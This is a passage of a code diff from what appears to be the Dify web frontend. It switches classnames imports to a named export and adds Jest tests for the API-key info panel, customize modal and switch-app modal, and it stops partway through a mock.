-import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' import PromptLogModal from '../../base/prompt-log-modal' import { WorkflowContextProvider } from '@/app/components/workflow/context' diff --git a/web/app/components/app/log/model-info.tsx b/web/app/components/app/log/model-info.tsx index 626ef093e9..b3c4f11be5 100644 --- a/web/app/components/app/log/model-info.tsx +++ b/web/app/components/app/log/model-info.tsx @@ -13,7 +13,7 @@ import { PortalToFollowElemTrigger, } from '@/app/components/base/portal-to-follow-elem' import { useTextGenerationCurrentProviderAndModelAndModelList } from '@/app/components/header/account-setting/model-provider-page/hooks' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const PARAM_MAP = { temperature: 'Temperature', diff --git a/web/app/components/app/log/var-panel.tsx b/web/app/components/app/log/var-panel.tsx index dd8c231a56..8915b3438a 100644 --- a/web/app/components/app/log/var-panel.tsx +++ b/web/app/components/app/log/var-panel.tsx @@ -9,7 +9,7 @@ import { } from '@remixicon/react' import { Variable02 } from '@/app/components/base/icons/src/vender/solid/development' import ImagePreview from '@/app/components/base/image-uploader/image-preview' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { varList: { label: string; value: string }[] diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' 
+import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: 
noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // Should not render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have 
correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ 
b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version title', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + 
expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.spec.tsx 
b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx new file mode 100644 index 0000000000..62eeb4299e --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/index.spec.tsx @@ -0,0 +1,162 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for CE edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: true, // Test CE edition by default +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Community Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Content Display', () => { + it('should display self-host title content', () => { + scenarios.withAPIKeyNotSet() + + expect(screen.getByText(textKeys.selfHost.titleRow1)).toBeInTheDocument() + expect(screen.getByText(textKeys.selfHost.titleRow2)).toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.selfHost.setAPIBtn)).toBeInTheDocument() + }) + + it('should render external 
link with correct href for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toBeInTheDocument() + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveTextContent(textKeys.selfHost.tryCloud) + }) + + it('should have external link with proper styling for self-host version', () => { + const { container } = scenarios.withAPIKeyNotSet() + const link = container.querySelector('a[href="https://cloud.dify.ai/apps"]') + + expect(link).toHaveClass( + 'mt-2', + 'flex', + 'h-[26px]', + 'items-center', + 'space-x-1', + 'p-1', + 'text-xs', + 'font-medium', + 'text-[#155EEF]', + ) + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Props and Styling', () => { + it('should render button with primary variant', () => { + scenarios.withAPIKeyNotSet() + const button = screen.getByRole('button') + expect(button).toHaveClass('btn-primary') + }) + + it('should render panel container with correct classes', () => { + const { container } = scenarios.withAPIKeyNotSet() + const panel = container.firstChild as HTMLElement + assertions.shouldHavePanelStyling(panel) + }) + }) + + describe('State Management', () => { + it('should start with visible panel (isShow: true)', () => { + scenarios.withAPIKeyNotSet() + 
assertions.shouldRenderMainButton() + }) + + it('should toggle visibility when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Edge Cases', () => { + it('should handle provider context loading state', () => { + scenarios.withAPIKeyNotSet({ + providerContext: { + modelProviders: [], + textGenerationModelList: [], + }, + }) + assertions.shouldRenderMainButton() + }) + }) + + describe('Accessibility', () => { + it('should have button with proper role', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByRole('button')).toBeInTheDocument() + }) + + it('should have clickable close button', () => { + const { container } = scenarios.withAPIKeyNotSet() + assertions.shouldHaveCloseButton(container) + }) + }) +}) diff --git a/web/app/components/app/overview/apikey-info-panel/index.tsx b/web/app/components/app/overview/apikey-info-panel/index.tsx index b50b0077cb..47fe7af972 100644 --- a/web/app/components/app/overview/apikey-info-panel/index.tsx +++ b/web/app/components/app/overview/apikey-info-panel/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' import { LinkExternal02 } from '@/app/components/base/icons/src/vender/line/general' import { IS_CE_EDITION } from '@/config' diff --git a/web/app/components/app/overview/app-card.tsx b/web/app/components/app/overview/app-card.tsx index a0f5780b71..15762923ff 100644 --- a/web/app/components/app/overview/app-card.tsx +++ b/web/app/components/app/overview/app-card.tsx @@ -401,7 +401,6 @@ function AppCard({ /> setShowCustomizeModal(false)} appId={appInfo.id} 
api_base_url={appInfo.api_base_url} diff --git a/web/app/components/app/overview/customize/index.spec.tsx b/web/app/components/app/overview/customize/index.spec.tsx new file mode 100644 index 0000000000..c960101b66 --- /dev/null +++ b/web/app/components/app/overview/customize/index.spec.tsx @@ -0,0 +1,434 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CustomizeModal from './index' +import { AppModeEnum } from '@/types/app' + +// Mock useDocLink from context +const mockDocLink = jest.fn((path?: string) => `https://docs.dify.ai/en-US${path || ''}`) +jest.mock('@/context/i18n', () => ({ + useDocLink: () => mockDocLink, +})) + +// Mock window.open +const mockWindowOpen = jest.fn() +Object.defineProperty(window, 'open', { + value: mockWindowOpen, + writable: true, +}) + +describe('CustomizeModal', () => { + const defaultProps = { + isShow: true, + onClose: jest.fn(), + api_base_url: 'https://api.example.com', + appId: 'test-app-id-123', + mode: AppModeEnum.CHAT, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests - verify component renders correctly with various configurations + describe('Rendering', () => { + it('should render without crashing when isShow is true', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + }) + + it('should not render content when isShow is false', async () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.queryByText('appOverview.overview.appInfo.customize.title')).not.toBeInTheDocument() + }) + }) + + it('should render modal description', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + 
expect(screen.getByText('appOverview.overview.appInfo.customize.explanation')).toBeInTheDocument() + }) + }) + + it('should render way 1 and way 2 tags', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way 1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way 2')).toBeInTheDocument() + }) + }) + + it('should render all step numbers (1, 2, 3)', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + expect(screen.getByText('2')).toBeInTheDocument() + expect(screen.getByText('3')).toBeInTheDocument() + }) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an 
SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: 
/step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + 
+ // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) 
+ expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the 
direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/overview/embedded/index.tsx b/web/app/components/app/overview/embedded/index.tsx index 6eba993e1d..d4be58b1b2 100644 --- a/web/app/components/app/overview/embedded/index.tsx +++ b/web/app/components/app/overview/embedded/index.tsx @@ -14,7 +14,7 @@ import type { SiteInfo } from '@/models/share' import { useThemeContext } from '@/app/components/base/chat/embedded-chatbot/theme/theme-context' import ActionButton from '@/app/components/base/action-button' import { basePath } from '@/utils/var' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { siteInfo?: SiteInfo diff --git a/web/app/components/app/overview/settings/index.tsx 
b/web/app/components/app/overview/settings/index.tsx index 3b71b8f75c..d079631cf7 100644 --- a/web/app/components/app/overview/settings/index.tsx +++ b/web/app/components/app/overview/settings/index.tsx @@ -25,7 +25,7 @@ import { useModalContext } from '@/context/modal-context' import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' import type { AppIconSelection } from '@/app/components/base/app-icon-picker' import AppIconPicker from '@/app/components/base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDocLink } from '@/context/i18n' export type ISettingsModalProps = { diff --git a/web/app/components/app/switch-app-modal/index.spec.tsx b/web/app/components/app/switch-app-modal/index.spec.tsx new file mode 100644 index 0000000000..b6fe838666 --- /dev/null +++ b/web/app/components/app/switch-app-modal/index.spec.tsx @@ -0,0 +1,295 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import SwitchAppModal from './index' +import { ToastContext } from '@/app/components/base/toast' +import type { App } from '@/types/app' +import { AppModeEnum } from '@/types/app' +import { Plan } from '@/app/components/billing/type' +import { NEED_REFRESH_APP_LIST_KEY } from '@/config' + +const mockPush = jest.fn() +const mockReplace = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + }), +})) + +const mockSetAppDetail = jest.fn() +jest.mock('@/app/components/app/store', () => ({ + useStore: (selector: (state: any) => unknown) => selector({ setAppDetail: mockSetAppDetail }), +})) + +const mockSwitchApp = jest.fn() +const mockDeleteApp = jest.fn() +jest.mock('@/service/apps', () => ({ + switchApp: (...args: unknown[]) => mockSwitchApp(...args), + deleteApp: (...args: unknown[]) => mockDeleteApp(...args), +})) + +let mockIsEditor = true 
+jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: mockIsEditor, + userProfile: { + email: 'user@example.com', + }, + langGeniusVersionInfo: { + current_version: '1.0.0', + }, + }), +})) + +let mockEnableBilling = false +let mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, +} +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: mockPlan, + enableBilling: mockEnableBilling, + }), +})) + +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) =>
    AppsFull {loc}
